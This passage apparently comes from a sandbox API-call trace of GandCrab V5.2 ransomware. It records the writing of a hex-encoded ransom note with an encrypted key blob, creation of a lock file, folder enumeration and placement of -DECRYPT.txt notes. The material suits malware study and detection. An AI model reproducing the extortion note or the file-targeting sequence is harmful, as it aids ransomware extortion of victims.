6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0071.890] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0071.891] CloseHandle (hObject=0x2bc) returned 1 [0071.891] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.892] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.892] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0xc7)) [0071.892] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.892] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0071.892] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0071.893] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a09d2ca4deb61a.lock") returned 97 [0071.893] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0071.895] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.895] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.895] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 73 [0071.895] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0071.895] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503938 [0071.895] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.895] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0071.895] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.895] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.896] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0071.896] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0071.896] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0071.896] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="1033" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0071.896] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" [0071.896] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0071.896] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.896] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0071.896] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.896] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0071.896] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.897] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0071.897] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.897] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0071.897] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.897] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.897] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\TITWMVJL-DECRYPT.txt") returned 99 [0071.897] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0071.898] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x